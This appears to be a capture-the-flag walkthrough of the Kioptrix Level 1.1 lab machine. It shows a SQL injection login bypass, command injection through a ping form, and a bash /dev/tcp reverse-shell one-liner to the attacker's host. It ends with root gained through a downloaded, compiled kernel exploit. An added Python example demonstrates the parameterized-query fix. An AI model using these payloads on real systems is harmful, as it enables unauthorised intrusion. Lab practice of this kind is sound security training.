Kioptrix: Level 1.1 (#2)

Lab Environment

Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux

Vulnerable Machine : Kioptrix: level 1.1(#2)

Let’s start hacking and breach the security of this machine 

Scanning Phase :

Now let’s scan the local network to which the attacking machine and the vulnerable machine are connected.
Syntax used: arp-scan -l
Victim machine: 192.168.113.130


Enumeration Phase :

I used Nmap for further enumeration of the ports and their services.
Syntax Used: nmap 192.168.113.130 -Pn 


I found an HTTP service on port 80, so I visited the web page to see if I could get something useful.
Boom !!
Found Login Page.

Authentication bypass should be the first approach against a login page.
Query used: 1'or'1'='1 (entered in both the Username and Password fields)
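Why that input gets past a login built by string concatenation, and how a parameterized query stops it, shown as an added example that is not part of the original walkthrough. SQLite stands in for the machine's database; the users table, its columns, the stored credentials and the function names are all assumptions.

```python
import sqlite3

PAGE_INPUT = "1'or'1'='1"  # the value the walkthrough enters in both fields


def make_db():
    """In-memory database with one constructed account (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext only to keep the example short; real code stores a password hash.
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_vulnerable(db, username, password):
    """Builds the SQL by concatenation, so quotes in the input become SQL syntax."""
    query = (
        "SELECT username FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    # With PAGE_INPUT the WHERE clause ends in ... OR '1'='1', which is always true.
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username, password):
    """Placeholders keep the input as data; it is compared literally, never parsed."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("concatenated query accepts page input:",
          login_vulnerable(db, PAGE_INPUT, PAGE_INPUT))
    print("parameterized query accepts page input:",
          login_parameterized(db, PAGE_INPUT, PAGE_INPUT))
    print("parameterized query accepts real credentials:",
          login_parameterized(db, "admin", "constructed-secret"))
```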

With this I got into the panel and was prompted with a page asking to ping a machine on the network.
To test this, I provided my own IP to see more clearly how it behaves.

Got a reply and ping statistics.


Gaining Access:

What did I think after the reply?
That there could be an OS command injection vulnerability, so I injected a one-liner for netcat to gain a reverse shell.
One-liner: bash -i >& /dev/tcp/attacker's IP/port 0>&1
Simultaneously, I fired up netcat to receive the reverse connection on port 4444.


Got shell !!!! 
It’s time to enumerate the machine to become root 
I found the kernel version to exploit the machine 
Syntax Used: uname -a 


All credit to exploit-db.com 
Found Privilege escalation exploit on exploit-db 


I downloaded the exploit to my attacking machine using the wget utility.
Then I started a simple Python server to transfer the exploit from the attacking machine to the victim machine.
Syntax used: python -m SimpleHTTPServer 1337


I changed my directory to tmp in reverse shell which I gained with Netcat and downloaded the exploit using wget.
Syntax used: cd /tmp
Downloading exploit from my attacking machine to victim machine 
OR
We can directly download to victim machine using wget.

Now it’s time to compile the exploit file.
Changing the name of the file from 9542 to paras.c
Syntax used: mv 9542 paras.c
Then compiling paras.c with the gcc compiler.
Syntax used: gcc paras.c
We got an a.out file.


Executing a.out 
Syntax used: ./a.out 

Finally got root !!!!










